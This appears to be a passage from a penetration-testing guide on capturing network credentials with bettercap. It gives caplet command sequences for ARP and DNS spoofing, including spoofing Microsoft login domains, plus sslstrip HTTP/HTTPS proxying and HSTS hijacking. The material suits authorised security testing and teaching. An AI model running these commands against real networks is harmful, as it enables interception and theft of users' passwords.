Password sniffers are a set of tools/scripts that typically perform man-in-the-middle attacks by discovery, spoofing, sniffing the traffic, and by proxying. From our previous experience, we noted that most organizations do not utilize SSL internally; Wireshark revealed multiple usernames and passwords.

In this section, we will explore bettercap to capture SSL traffic on the network so that we can capture the credentials of network users. bettercap is similar to the previous-generation ettercap command, with the additional capability to perform network-level spoofing and sniffing. It can be downloaded to Kali Linux by running apt-get install bettercap from the Terminal. bettercap underwent a lot of development in 2018 to make it compatible with the user interface and enabled caplet use. Caplets are just .cap files that can be scripted to achieve an objective for interactive sessions; this can be updated by a simple command on the Terminal: sudo bettercap -eval "caplets.update; q", similarly to Metasploit's .rc files.

This tool can be utilized for more effective man-in-the-middle attack on a given internal network. In this example, we will utilize one caplet with the following script to capture passwords with an ARP and DNS spoof:

net.sniff on
» set http.proxy.sslstrip true
» http.proxy on
» set dns.spoof.domains www.office.com,login.microsoftonline.com,testfire.net
» set dns.spoof.all true
» dns.spoof on
» arp.spoof on

bettercap must be able to sniff all the traffic on the target network without any problem, as the following screenshot showcases:

To strip SSL traffic, we can utilize the https.proxy module, as follows:

» net.sniff on
» set https.proxy.sslstrip true
» https.proxy on
» arp.spoof on
» hstshijack/hstshijack

The preceding commands in bettercap must enable attackers to see HTTPS traffic, as shown in the following screenshot:

Penetration testers should be careful when using bettercap, as this will pause the entire network your Kali Linux is connected to.